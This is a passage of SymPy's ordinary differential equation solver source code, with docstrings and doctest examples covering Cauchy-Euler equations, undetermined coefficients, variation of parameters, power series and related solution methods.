from the expression and all of its linear independent derivatives and
substituting them into the original ODE. The coefficients for each term
will be a system of linear equations, which are be solved for and
substituted, giving the solution. If any of the trial functions are linearly
dependent on the solution to the homogeneous equation, they are multiplied
by sufficient `x` to make them linearly independent.
Examples
========
>>> from sympy import dsolve, Function, Derivative, log
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = x**2*Derivative(f(x), x, x) - 2*x*Derivative(f(x), x) + 2*f(x) - log(x)
>>> dsolve(eq, f(x),
... hint='nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients').expand()
Eq(f(x), C1*x + C2*x**2 + log(x)/2 + 3/4)
"""
x = func.args[0]
f = func.func
r = match
chareq, eq, symbol = S.Zero, S.Zero, Dummy('x')
for i in r.keys():
if not isinstance(i, str) and i >= 0:
chareq += (r[i]*diff(x**symbol, x, i)*x**-symbol).expand()
for i in range(1,degree(Poly(chareq, symbol))+1):
eq += chareq.coeff(symbol**i)*diff(f(x), x, i)
if chareq.as_coeff_add(symbol)[0]:
eq += chareq.as_coeff_add(symbol)[0]*f(x)
e, re = posify(r[-1].subs(x, exp(x)))
eq += e.subs(re)
match = _nth_linear_match(eq, f(x), ode_order(eq, f(x)))
eq_homogeneous = Add(eq,-match[-1])
match['trialset'] = _undetermined_coefficients_match(match[-1], x, func, eq_homogeneous)['trialset']
return ode_nth_linear_constant_coeff_undetermined_coefficients(eq, func, order, match).subs(x, log(x)).subs(f(log(x)), f(x)).expand()
def ode_nth_linear_euler_eq_nonhomogeneous_variation_of_parameters(eq, func, order, match, returns='sol'):
r"""
Solves an `n`\th order linear non homogeneous Cauchy-Euler equidimensional
ordinary differential equation using variation of parameters.
This is an equation with form `g(x) = a_0 f(x) + a_1 x f'(x) + a_2 x^2 f''(x)
\cdots`.
This method works by assuming that the particular solution takes the form
.. math:: \sum_{x=1}^{n} c_i(x) y_i(x) {a_n} {x^n} \text{,}
where `y_i` is the `i`\th solution to the homogeneous equation. The
solution is then solved using Wronskian's and Cramer's Rule. The
particular solution is given by multiplying eq given below with `a_n x^{n}`
.. math:: \sum_{x=1}^n \left( \int \frac{W_i(x)}{W(x)} \,dx
\right) y_i(x) \text{,}
where `W(x)` is the Wronskian of the fundamental system (the system of `n`
linearly independent solutions to the homogeneous equation), and `W_i(x)`
is the Wronskian of the fundamental system with the `i`\th column replaced
with `[0, 0, \cdots, 0, \frac{x^{- n}}{a_n} g{\left(x \right)}]`.
This method is general enough to solve any `n`\th order inhomogeneous
linear differential equation, but sometimes SymPy cannot simplify the
Wronskian well enough to integrate it. If this method hangs, try using the
``nth_linear_constant_coeff_variation_of_parameters_Integral`` hint and
simplifying the integrals manually. Also, prefer using
``nth_linear_constant_coeff_undetermined_coefficients`` when it
applies, because it doesn't use integration, making it faster and more
reliable.
Warning, using simplify=False with
'nth_linear_constant_coeff_variation_of_parameters' in
:py:meth:`~sympy.solvers.ode.dsolve` may cause it to hang, because it will
not attempt to simplify the Wronskian before integrating. It is
recommended that you only use simplify=False with
'nth_linear_constant_coeff_variation_of_parameters_Integral' for this
method, especially if the solution to the homogeneous equation has
trigonometric functions in it.
Examples
========
>>> from sympy import Function, dsolve, Derivative
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = x**2*Derivative(f(x), x, x) - 2*x*Derivative(f(x), x) + 2*f(x) - x**4
>>> dsolve(eq, f(x),
... hint='nth_linear_euler_eq_nonhomogeneous_variation_of_parameters').expand()
Eq(f(x), C1*x + C2*x**2 + x**4/6)
"""
x = func.args[0]
f = func.func
r = match
gensol = ode_nth_linear_euler_eq_homogeneous(eq, func, order, match, returns='both')
match.update(gensol)
r[-1] = r[-1]/r[ode_order(eq, f(x))]
sol = _solve_variation_of_parameters(eq, func, order, match)
return Eq(f(x), r['sol'].rhs + (sol.rhs - r['sol'].rhs)*r[ode_order(eq, f(x))])
def _linear_coeff_match(expr, func):
r"""
Helper function to match hint ``linear_coefficients``.
Matches the expression to the form `(a_1 x + b_1 f(x) + c_1)/(a_2 x + b_2
f(x) + c_2)` where the following conditions hold:
1. `a_1`, `b_1`, `c_1`, `a_2`, `b_2`, `c_2` are Rationals;
2. `c_1` or `c_2` are not equal to zero;
3. `a_2 b_1 - a_1 b_2` is not equal to zero.
Return ``xarg``, ``yarg`` where
1. ``xarg`` = `(b_2 c_1 - b_1 c_2)/(a_2 b_1 - a_1 b_2)`
2. ``yarg`` = `(a_1 c_2 - a_2 c_1)/(a_2 b_1 - a_1 b_2)`
Examples
========
>>> from sympy import Function
>>> from sympy.abc import x
>>> from sympy.solvers.ode.ode import _linear_coeff_match
>>> from sympy.functions.elementary.trigonometric import sin
>>> f = Function('f')
>>> _linear_coeff_match((
... (-25*f(x) - 8*x + 62)/(4*f(x) + 11*x - 11)), f(x))
(1/9, 22/9)
>>> _linear_coeff_match(
... sin((-5*f(x) - 8*x + 6)/(4*f(x) + x - 1)), f(x))
(19/27, 2/27)
>>> _linear_coeff_match(sin(f(x)/x), f(x))
"""
f = func.func
x = func.args[0]
def abc(eq):
r'''
Internal function of _linear_coeff_match
that returns Rationals a, b, c
if eq is a*x + b*f(x) + c, else None.
'''
eq = _mexpand(eq)
c = eq.as_independent(x, f(x), as_Add=True)[0]
if not c.is_Rational:
return
a = eq.coeff(x)
if not a.is_Rational:
return
b = eq.coeff(f(x))
if not b.is_Rational:
return
if eq == a*x + b*f(x) + c:
return a, b, c
def match(arg):
r'''
Internal function of _linear_coeff_match that returns Rationals a1,
b1, c1, a2, b2, c2 and a2*b1 - a1*b2 of the expression (a1*x + b1*f(x)
+ c1)/(a2*x + b2*f(x) + c2) if one of c1 or c2 and a2*b1 - a1*b2 is
non-zero, else None.
'''
n, d = arg.together().as_numer_denom()
m = abc(n)
if m is not None:
a1, b1, c1 = m
m = abc(d)
if m is not None:
a2, b2, c2 = m
d = a2*b1 - a1*b2
if (c1 or c2) and d:
return a1, b1, c1, a2, b2, c2, d
m = [fi.args[0] for fi in expr.atoms(Function) if fi.func != f and
len(fi.args) == 1 and not fi.args[0].is_Function] or {expr}
m1 = match(m.pop())
if m1 and all(match(mi) == m1 for mi in m):
a1, b1, c1, a2, b2, c2, denom = m1
return (b2*c1 - b1*c2)/denom, (a1*c2 - a2*c1)/denom
def ode_linear_coefficients(eq, func, order, match):
r"""
Solves a differential equation with linear coefficients.
The general form of a differential equation with linear coefficients is
.. math:: y' + F\left(\!\frac{a_1 x + b_1 y + c_1}{a_2 x + b_2 y +
c_2}\!\right) = 0\text{,}
where `a_1`, `b_1`, `c_1`, `a_2`, `b_2`, `c_2` are constants and `a_1 b_2
- a_2 b_1 \ne 0`.
This can be solved by substituting:
.. math:: x = x' + \frac{b_2 c_1 - b_1 c_2}{a_2 b_1 - a_1 b_2}
y = y' + \frac{a_1 c_2 - a_2 c_1}{a_2 b_1 - a_1
b_2}\text{.}
This substitution reduces the equation to a homogeneous differential
equation.
See Also
========
:meth:`sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best`
:meth:`sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`
:meth:`sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep`
Examples
========
>>> from sympy import Function, pprint
>>> from sympy.solvers.ode.ode import dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> df = f(x).diff(x)
>>> eq = (x + f(x) + 1)*df + (f(x) - 6*x + 1)
>>> dsolve(eq, hint='linear_coefficients')
[Eq(f(x), -x - sqrt(C1 + 7*x**2) - 1), Eq(f(x), -x + sqrt(C1 + 7*x**2) - 1)]
>>> pprint(dsolve(eq, hint='linear_coefficients'))
___________ ___________
/ 2 / 2
[f(x) = -x - \/ C1 + 7*x - 1, f(x) = -x + \/ C1 + 7*x - 1]
References
==========
- Joel Moses, "Symbolic Integration - The Stormy Decade", Communications
of the ACM, Volume 14, Number 8, August 1971, pp. 558
"""
return ode_1st_homogeneous_coeff_best(eq, func, order, match)
def ode_separable_reduced(eq, func, order, match):
r"""
Solves a differential equation that can be reduced to the separable form.
The general form of this equation is
.. math:: y' + (y/x) H(x^n y) = 0\text{}.
This can be solved by substituting `u(y) = x^n y`. The equation then
reduces to the separable form `\frac{u'}{u (\mathrm{power} - H(u))} -
\frac{1}{x} = 0`.
The general solution is:
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x, n
>>> f, g = map(Function, ['f', 'g'])
>>> genform = f(x).diff(x) + (f(x)/x)*g(x**n*f(x))
>>> pprint(genform)
/ n \
d f(x)*g\x *f(x)/
--(f(x)) + ---------------
dx x
>>> pprint(dsolve(genform, hint='separable_reduced'))
n
x *f(x)
/
|
| 1
| ------------ dy = C1 + log(x)
| y*(n - g(y))
|
/
See Also
========
:meth:`sympy.solvers.ode.ode.ode_separable`
Examples
========
>>> from sympy import Function, pprint
>>> from sympy.solvers.ode.ode import dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> d = f(x).diff(x)
>>> eq = (x - x**2*f(x))*d - f(x)
>>> dsolve(eq, hint='separable_reduced')
[Eq(f(x), (1 - sqrt(C1*x**2 + 1))/x), Eq(f(x), (sqrt(C1*x**2 + 1) + 1)/x)]
>>> pprint(dsolve(eq, hint='separable_reduced'))
___________ ___________
/ 2 / 2
1 - \/ C1*x + 1 \/ C1*x + 1 + 1
[f(x) = ------------------, f(x) = ------------------]
x x
References
==========
- Joel Moses, "Symbolic Integration - The Stormy Decade", Communications
of the ACM, Volume 14, Number 8, August 1971, pp. 558
"""
# Arguments are passed in a way so that they are coherent with the
# ode_separable function
x = func.args[0]
f = func.func
y = Dummy('y')
u = match['u'].subs(match['t'], y)
ycoeff = 1/(y*(match['power'] - u))
m1 = {y: 1, x: -1/x, 'coeff': 1}
m2 = {y: ycoeff, x: 1, 'coeff': 1}
r = {'m1': m1, 'm2': m2, 'y': y, 'hint': x**match['power']*f(x)}
return ode_separable(eq, func, order, r)
def ode_1st_power_series(eq, func, order, match):
r"""
The power series solution is a method which gives the Taylor series expansion
to the solution of a differential equation.
For a first order differential equation `\frac{dy}{dx} = h(x, y)`, a power
series solution exists at a point `x = x_{0}` if `h(x, y)` is analytic at `x_{0}`.
The solution is given by
.. math:: y(x) = y(x_{0}) + \sum_{n = 1}^{\infty} \frac{F_{n}(x_{0},b)(x - x_{0})^n}{n!},
where `y(x_{0}) = b` is the value of y at the initial value of `x_{0}`.
To compute the values of the `F_{n}(x_{0},b)` the following algorithm is
followed, until the required number of terms are generated.
1. `F_1 = h(x_{0}, b)`
2. `F_{n+1} = \frac{\partial F_{n}}{\partial x} + \frac{\partial F_{n}}{\partial y}F_{1}`
Examples
========
>>> from sympy import Function, pprint, exp
>>> from sympy.solvers.ode.ode import dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = exp(x)*(f(x).diff(x)) - f(x)
>>> pprint(dsolve(eq, hint='1st_power_series'))
3 4 5
C1*x C1*x C1*x / 6\
f(x) = C1 + C1*x - ----- + ----- + ----- + O\x /
6 24 60
References
==========
- Travis W. Walker, Analytic power series technique for solving first-order
differential equations, p.p 17, 18
"""
x = func.args[0]
y = match['y']
f = func.func
h = -match[match['d']]/match[match['e']]
point = match.get('f0')
value = match.get('f0val')
terms = match.get('terms')
# First term
F = h
if not h:
return Eq(f(x), value)
# Initialization
series = value
if terms > 1:
hc = h.subs({x: point, y: value})
if hc.has(oo) or hc.has(NaN) or hc.has(zoo):
# Derivative does not exist, not analytic
return Eq(f(x), oo)
elif hc:
series += hc*(x - point)
for factcount in range(2, terms):
Fnew = F.diff(x) + F.diff(y)*h
Fnewc = Fnew.subs({x: point, y: value})
# Same logic as above
if Fnewc.has(oo) or Fnewc.has(NaN) or Fnewc.has(-oo) or Fnewc.has(zoo):
return Eq(f(x), oo)
series += Fnewc*((x - point)**factcount)/factorial(factcount)
F = Fnew
series += Order(x**terms)
return Eq(f(x), series)
def ode_nth_linear_constant_coeff_homogeneous(eq, func, order, match,
returns='sol'):
r"""
Solves an `n`\th order linear homogeneous differential equation with
constant coefficients.
This is an equation of the form
.. math:: a_n f^{(n)}(x) + a_{n-1} f^{(n-1)}(x) + \cdots + a_1 f'(x)
+ a_0 f(x) = 0\text{.}
These equations can be solved in a general manner, by taking the roots of
the characteristic equation `a_n m^n + a_{n-1} m^{n-1} + \cdots + a_1 m +
a_0 = 0`. The solution will then be the sum of `C_n x^i e^{r x}` terms,
for each where `C_n` is an arbitrary constant, `r` is a root of the
characteristic equation and `i` is one of each from 0 to the multiplicity
of the root - 1 (for example, a root 3 of multiplicity 2 would create the
terms `C_1 e^{3 x} + C_2 x e^{3 x}`). The exponential is usually expanded
for complex roots using Euler's equation `e^{I x} = \cos(x) + I \sin(x)`.
Complex roots always come in conjugate pairs in polynomials with real
coefficients, so the two roots will be represented (after simplifying the
constants) as `e^{a x} \left(C_1 \cos(b x) + C_2 \sin(b x)\right)`.
If SymPy cannot find exact roots to the characteristic equation, a
:py:class:`~sympy.polys.rootoftools.ComplexRootOf` instance will be return
instead.
>>> from sympy import Function, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(f(x).diff(x, 5) + 10*f(x).diff(x) - 2*f(x), f(x),
... hint='nth_linear_constant_coeff_homogeneous')
... # doctest: +NORMALIZE_WHITESPACE
Eq(f(x), C5*exp(x*CRootOf(_x**5 + 10*_x - 2, 0))
+ (C1*sin(x*im(CRootOf(_x**5 + 10*_x - 2, 1)))
+ C2*cos(x*im(CRootOf(_x**5 + 10*_x - 2, 1))))*exp(x*re(CRootOf(_x**5 + 10*_x - 2, 1)))
+ (C3*sin(x*im(CRootOf(_x**5 + 10*_x - 2, 3)))
+ C4*cos(x*im(CRootOf(_x**5 + 10*_x - 2, 3))))*exp(x*re(CRootOf(_x**5 + 10*_x - 2, 3))))
Note that because this method does not involve integration, there is no
``nth_linear_constant_coeff_homogeneous_Integral`` hint.
The following is for internal use:
- ``returns = 'sol'`` returns the solution to the ODE.
- ``returns = 'list'`` returns a list of linearly independent solutions,
for use with non homogeneous solution methods like variation of
parameters and undetermined coefficients. Note that, though the
solutions should be linearly independent, this function does not
explicitly check that. You can do ``assert simplify(wronskian(sollist))
!= 0`` to check for linear independence. Also, ``assert len(sollist) ==
order`` will need to pass.
- ``returns = 'both'``, return a dictionary ``{'sol': <solution to ODE>,
'list': <list of linearly independent solutions>}``.
Examples
========
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x, 4) + 2*f(x).diff(x, 3) -
... 2*f(x).diff(x, 2) - 6*f(x).diff(x) + 5*f(x), f(x),
... hint='nth_linear_constant_coeff_homogeneous'))
x -2*x
f(x) = (C1 + C2*x)*e + (C3*sin(x) + C4*cos(x))*e
References
==========
- https://en.wikipedia.org/wiki/Linear_differential_equation section:
Nonhomogeneous_equation_with_constant_coefficients
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 211
# indirect doctest
"""
x = func.args[0]
f = func.func
r = match
# First, set up characteristic equation.
chareq, symbol = S.Zero, Dummy('x')
for i in r.keys():
if type(i) == str or i < 0:
pass
else:
chareq += r[i]*symbol**i
chareq = Poly(chareq, symbol)
# Can't just call roots because it doesn't return rootof for unsolveable
# polynomials.
chareqroots = roots(chareq, multiple=True)
if len(chareqroots) != order:
chareqroots = [rootof(chareq, k) for k in range(chareq.degree())]
chareq_is_complex = not all([i.is_real for i in chareq.all_coeffs()])
# A generator of constants
constants = list(get_numbered_constants(eq, num=chareq.degree()*2))
# Create a dict root: multiplicity or charroots
charroots = defaultdict(int)
for root in chareqroots:
charroots[root] += 1
# We need to keep track of terms so we can run collect() at the end.
# This is necessary for constantsimp to work properly.
#
# XXX: This global collectterms hack should be removed.
global collectterms
collectterms = []
gensols = []
conjugate_roots = [] # used to prevent double-use of conjugate roots
# Loop over roots in theorder provided by roots/rootof...
for root in chareqroots:
# but don't repoeat multiple roots.
if root not in charroots:
continue
multiplicity = charroots.pop(root)
for i in range(multiplicity):
if chareq_is_complex:
gensols.append(x**i*exp(root*x))
collectterms = [(i, root, 0)] + collectterms
continue
reroot = re(root)
imroot = im(root)
if imroot.has(atan2) and reroot.has(atan2):
# Remove this condition when re and im stop returning
# circular atan2 usages.
gensols.append(x**i*exp(root*x))
collectterms = [(i, root, 0)] + collectterms
else:
if root in conjugate_roots:
collectterms = [(i, reroot, imroot)] + collectterms
continue
if imroot == 0:
gensols.append(x**i*exp(reroot*x))
collectterms = [(i, reroot, 0)] + collectterms
continue
conjugate_roots.append(conjugate(root))
gensols.append(x**i*exp(reroot*x) * sin(abs(imroot) * x))
gensols.append(x**i*exp(reroot*x) * cos( imroot * x))
# This ordering is important
collectterms = [(i, reroot, imroot)] + collectterms
if returns == 'list':
return gensols
elif returns in ('sol' 'both'):
gsol = Add(*[i*j for (i, j) in zip(constants, gensols)])
if returns == 'sol':
return Eq(f(x), gsol)
else:
return {'sol': Eq(f(x), gsol), 'list': gensols}
else:
raise ValueError('Unknown value for key "returns".')
def ode_nth_linear_constant_coeff_undetermined_coefficients(eq, func, order, match):
r"""
Solves an `n`\th order linear differential equation with constant
coefficients using the method of undetermined coefficients.
This method works on differential equations of the form
.. math:: a_n f^{(n)}(x) + a_{n-1} f^{(n-1)}(x) + \cdots + a_1 f'(x)
+ a_0 f(x) = P(x)\text{,}
where `P(x)` is a function that has a finite number of linearly
independent derivatives.
Functions that fit this requirement are finite sums functions of the form
`a x^i e^{b x} \sin(c x + d)` or `a x^i e^{b x} \cos(c x + d)`, where `i`
is a non-negative integer and `a`, `b`, `c`, and `d` are constants. For
example any polynomial in `x`, functions like `x^2 e^{2 x}`, `x \sin(x)`,
and `e^x \cos(x)` can all be used. Products of `\sin`'s and `\cos`'s have
a finite number of derivatives, because they can be expanded into `\sin(a
x)` and `\cos(b x)` terms. However, SymPy currently cannot do that
expansion, so you will need to manually rewrite the expression in terms of
the above to use this method. So, for example, you will need to manually
convert `\sin^2(x)` into `(1 + \cos(2 x))/2` to properly apply the method
of undetermined coefficients on it.
This method works by creating a trial function from the expression and all
of its linear independent derivatives and substituting them into the
original ODE. The coefficients for each term will be a system of linear
equations, which are be solved for and substituted, giving the solution.
If any of the trial functions are linearly dependent on the solution to
the homogeneous equation, they are multiplied by sufficient `x` to make
them linearly independent.
Examples
========
>>> from sympy import Function, dsolve, pprint, exp, cos
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x, 2) + 2*f(x).diff(x) + f(x) -
... 4*exp(-x)*x**2 + cos(2*x), f(x),
... hint='nth_linear_constant_coeff_undetermined_coefficients'))
/ / 3\\
| | x || -x 4*sin(2*x) 3*cos(2*x)
f(x) = |C1 + x*|C2 + --||*e - ---------- + ----------
\ \ 3 // 25 25
References
==========
- https://en.wikipedia.org/wiki/Method_of_undetermined_coefficients
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 221
# indirect doctest
"""
gensol = ode_nth_linear_constant_coeff_homogeneous(eq, func, order, match,
returns='both')
match.update(gensol)
return _solve_undetermined_coefficients(eq, func, order, match)
def _solve_undetermined_coefficients(eq, func, order, match):
r"""
Helper function for the method of undetermined coefficients.
See the
:py:meth:`~sympy.solvers.ode.ode.ode_nth_linear_constant_coeff_undetermined_coefficients`
docstring for more information on this method.
The parameter ``match`` should be a dictionary that has the following
keys:
``list``
A list of solutions to the homogeneous equation, such as the list
returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='list')``.
``sol``
The general solution, such as the solution returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='sol')``.
``trialset``
The set of trial functions as returned by
``_undetermined_coefficients_match()['trialset']``.
"""
x = func.args[0]
f = func.func
r = match
coeffs = numbered_symbols('a', cls=Dummy)
coefflist = []
gensols = r['list']
gsol = r['sol']
trialset = r['trialset']
if len(gensols) != order:
raise NotImplementedError("Cannot find " + str(order) +
" solutions to the homogeneous equation necessary to apply" +
" undetermined coefficients to " + str(eq) +
" (number of terms != order)")
trialfunc = 0
for i in trialset:
c = next(coeffs)
coefflist.append(c)
trialfunc += c*i
eqs = sub_func_doit(eq, f(x), trialfunc)
coeffsdict = dict(list(zip(trialset, [0]*(len(trialset) + 1))))
eqs = _mexpand(eqs)
for i in Add.make_args(eqs):
s = separatevars(i, dict=True, symbols=[x])
if coeffsdict.get(s[x]):
coeffsdict[s[x]] += s['coeff']
else:
coeffsdict[s[x]] = s['coeff']
coeffvals = solve(list(coeffsdict.values()), coefflist)
if not coeffvals:
raise NotImplementedError(
"Could not solve `%s` using the "
"method of undetermined coefficients "
"(unable to solve for coefficients)." % eq)
psol = trialfunc.subs(coeffvals)
return Eq(f(x), gsol.rhs + psol)
def _undetermined_coefficients_match(expr, x, func=None, eq_homogeneous=S.Zero):
r"""
Returns a trial function match if undetermined coefficients can be applied
to ``expr``, and ``None`` otherwise.
A trial expression can be found for an expression for use with the method
of undetermined coefficients if the expression is an
additive/multiplicative combination of constants, polynomials in `x` (the
independent variable of expr), `\sin(a x + b)`, `\cos(a x + b)`, and
`e^{a x}` terms (in other words, it has a finite number of linearly
independent derivatives).
Note that you may still need to multiply each term returned here by
sufficient `x` to make it linearly independent with the solutions to the
homogeneous equation.
This is intended for internal use by ``undetermined_coefficients`` hints.
SymPy currently has no way to convert `\sin^n(x) \cos^m(y)` into a sum of
only `\sin(a x)` and `\cos(b x)` terms, so these are not implemented. So,
for example, you will need to manually convert `\sin^2(x)` into `[1 +
\cos(2 x)]/2` to properly apply the method of undetermined coefficients on
it.
Examples
========
>>> from sympy import log, exp
>>> from sympy.solvers.ode.ode import _undetermined_coefficients_match
>>> from sympy.abc import x
>>> _undetermined_coefficients_match(9*x*exp(x) + exp(-x), x)
{'test': True, 'trialset': {x*exp(x), exp(-x), exp(x)}}
>>> _undetermined_coefficients_match(log(x), x)
{'test': False}
"""
a = Wild('a', exclude=[x])
b = Wild('b', exclude=[x])
expr = powsimp(expr, combine='exp') # exp(x)*exp(2*x + 1) => exp(3*x + 1)
retdict = {}
def _test_term(expr, x):
r"""
Test if ``expr`` fits the proper form for undetermined coefficients.
"""
if not expr.has(x):
return True
elif expr.is_Add:
return all(_test_term(i, x) for i in expr.args)
elif expr.is_Mul:
if expr.has(sin, cos):
foundtrig = False
# Make sure that there is only one trig function in the args.
# See the docstring.
for i in expr.args:
if i.has(sin, cos):
if foundtrig:
return False
else:
foundtrig = True
return all(_test_term(i, x) for i in expr.args)
elif expr.is_Function:
if expr.func in (sin, cos, exp, sinh, cosh):
if expr.args[0].match(a*x + b):
return True
else:
return False
else:
return False
elif expr.is_Pow and expr.base.is_Symbol and expr.exp.is_Integer and \
expr.exp >= 0:
return True
elif expr.is_Pow and expr.base.is_number:
if expr.exp.match(a*x + b):
return True
else:
return False
elif expr.is_Symbol or expr.is_number:
return True
else:
return False
def _get_trial_set(expr, x, exprs=set([])):
r"""
Returns a set of trial terms for undetermined coefficients.
The idea behind undetermined coefficients is that the terms expression
repeat themselves after a finite number of derivatives, except for the
coefficients (they are linearly dependent). So if we collect these,
we should have the terms of our trial function.
"""
def _remove_coefficient(expr, x):
r"""
Returns the expression without a coefficient.
Similar to expr.as_independent(x)[1], except it only works
multiplicatively.
"""
term = S.One
if expr.is_Mul:
for i in expr.args:
if i.has(x):
term *= i
elif expr.has(x):
term = expr
return term
expr = expand_mul(expr)
if expr.is_Add:
for term in expr.args:
if _remove_coefficient(term, x) in exprs:
pass
else:
exprs.add(_remove_coefficient(term, x))
exprs = exprs.union(_get_trial_set(term, x, exprs))
else:
term = _remove_coefficient(expr, x)
tmpset = exprs.union({term})
oldset = set([])
while tmpset != oldset:
# If you get stuck in this loop, then _test_term is probably
# broken
oldset = tmpset.copy()
expr = expr.diff(x)
term = _remove_coefficient(expr, x)
if term.is_Add:
tmpset = tmpset.union(_get_trial_set(term, x, tmpset))
else:
tmpset.add(term)
exprs = tmpset
return exprs
def is_homogeneous_solution(term):
r""" This function checks whether the given trialset contains any root
of homogenous equation"""
return expand(sub_func_doit(eq_homogeneous, func, term)).is_zero
retdict['test'] = _test_term(expr, x)
if retdict['test']:
# Try to generate a list of trial solutions that will have the
# undetermined coefficients. Note that if any of these are not linearly
# independent with any of the solutions to the homogeneous equation,
# then they will need to be multiplied by sufficient x to make them so.
# This function DOES NOT do that (it doesn't even look at the
# homogeneous equation).
temp_set = set([])
for i in Add.make_args(expr):
act = _get_trial_set(i,x)
if eq_homogeneous is not S.Zero:
while any(is_homogeneous_solution(ts) for ts in act):
act = {x*ts for ts in act}
temp_set = temp_set.union(act)
retdict['trialset'] = temp_set
return retdict
def ode_nth_linear_constant_coeff_variation_of_parameters(eq, func, order, match):
r"""
Solves an `n`\th order linear differential equation with constant
coefficients using the method of variation of parameters.
This method works on any differential equations of the form
.. math:: f^{(n)}(x) + a_{n-1} f^{(n-1)}(x) + \cdots + a_1 f'(x) + a_0
f(x) = P(x)\text{.}
This method works by assuming that the particular solution takes the form
.. math:: \sum_{x=1}^{n} c_i(x) y_i(x)\text{,}
where `y_i` is the `i`\th solution to the homogeneous equation. The
solution is then solved using Wronskian's and Cramer's Rule. The
particular solution is given by
.. math:: \sum_{x=1}^n \left( \int \frac{W_i(x)}{W(x)} \,dx
\right) y_i(x) \text{,}
where `W(x)` is the Wronskian of the fundamental system (the system of `n`
linearly independent solutions to the homogeneous equation), and `W_i(x)`
is the Wronskian of the fundamental system with the `i`\th column replaced
with `[0, 0, \cdots, 0, P(x)]`.
This method is general enough to solve any `n`\th order inhomogeneous
linear differential equation with constant coefficients, but sometimes
SymPy cannot simplify the Wronskian well enough to integrate it. If this
method hangs, try using the
``nth_linear_constant_coeff_variation_of_parameters_Integral`` hint and
simplifying the integrals manually. Also, prefer using
``nth_linear_constant_coeff_undetermined_coefficients`` when it
applies, because it doesn't use integration, making it faster and more
reliable.
Warning, using simplify=False with
'nth_linear_constant_coeff_variation_of_parameters' in
:py:meth:`~sympy.solvers.ode.dsolve` may cause it to hang, because it will
not attempt to simplify the Wronskian before integrating. It is
recommended that you only use simplify=False with
'nth_linear_constant_coeff_variation_of_parameters_Integral' for this
method, especially if the solution to the homogeneous equation has
trigonometric functions in it.
Examples
========
>>> from sympy import Function, dsolve, pprint, exp, log
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x, 3) - 3*f(x).diff(x, 2) +
... 3*f(x).diff(x) - f(x) - exp(x)*log(x), f(x),
... hint='nth_linear_constant_coeff_variation_of_parameters'))
/ / / x*log(x) 11*x\\\ x
f(x) = |C1 + x*|C2 + x*|C3 + -------- - ----|||*e
\ \ \ 6 36 ///
References
==========
- https://en.wikipedia.org/wiki/Variation_of_parameters
- http://planetmath.org/VariationOfParameters
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 233
# indirect doctest
"""
gensol = ode_nth_linear_constant_coeff_homogeneous(eq, func, order, match,
returns='both')
match.update(gensol)
return _solve_variation_of_parameters(eq, func, order, match)
def _solve_variation_of_parameters(eq, func, order, match):
r"""
Helper function for the method of variation of parameters and nonhomogeneous euler eq.
See the
:py:meth:`~sympy.solvers.ode.ode.ode_nth_linear_constant_coeff_variation_of_parameters`
docstring for more information on this method.
The parameter ``match`` should be a dictionary that has the following
keys:
``list``
A list of solutions to the homogeneous equation, such as the list
returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='list')``.
``sol``
The general solution, such as the solution returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='sol')``.
"""
x = func.args[0]
f = func.func
r = match
psol = 0
gensols = r['list']
gsol = r['sol']
wr = wronskian(gensols, x)
if r.get('simplify', True):
wr = simplify(wr) # We need much better simplification for
# some ODEs. See issue 4662, for example.
# To reduce commonly occurring sin(x)**2 + cos(x)**2 to 1
wr = trigsimp(wr, deep=True, recursive=True)
if not wr:
# The wronskian will be 0 iff the solutions are not linearly
# independent.
raise NotImplementedError("Cannot find " + str(order) +
" solutions to the homogeneous equation necessary to apply " +
"variation of parameters to " + str(eq) + " (Wronskian == 0)")
if len(gensols) != order:
raise NotImplementedError("Cannot find " + str(order) +
" solutions to the homogeneous equation necessary to apply " +
"variation of parameters to " +
str(eq) + " (number of terms != order)")
negoneterm = (-1)**(order)
for i in gensols:
psol += negoneterm*Integral(wronskian([sol for sol in gensols if sol != i], x)*r[-1]/wr, x)*i/r[order]
negoneterm *= -1
if r.get('simplify', True):
psol = simplify(psol)
psol = trigsimp(psol, deep=True)
return Eq(f(x), gsol.rhs + psol)
def ode_separable(eq, func, order, match):
r"""
Solves separable 1st order differential equations.
This is any differential equation that can be written as `P(y)
\tfrac{dy}{dx} = Q(x)`. The solution can then just be found by
rearranging terms and integrating: `\int P(y) \,dy = \int Q(x) \,dx`.
This hint uses :py:meth:`sympy.simplify.simplify.separatevars` as its back
end, so if a separable equation is not caught by this solver, it is most
likely the fault of that function.
:py:meth:`~sympy.simplify.simplify.separatevars` is
smart enough to do most expansion and factoring necessary to convert a
separable equation `F(x, y)` into the proper form `P(x)\cdot{}Q(y)`. The
general solution is::
>>> from sympy import Function, dsolve, Eq, pprint
>>> from sympy.abc import x
>>> a, b, c, d, f = map(Function, ['a', 'b', 'c', 'd', 'f'])
>>> genform = Eq(a(x)*b(f(x))*f(x).diff(x), c(x)*d(f(x)))
>>> pprint(genform)
d
a(x)*b(f(x))*--(f(x)) = c(x)*d(f(x))
dx
>>> pprint(dsolve(genform, f(x), hint='separable_Integral'))
f(x)
/ /
| |
| b(y) | c(x)
| ---- dy = C1 + | ---- dx
| d(y) | a(x)
| |
/ /
Examples
========
>>> from sympy import Function, dsolve, Eq
>>> from sympy.abc import x
>>> f = Function('f')
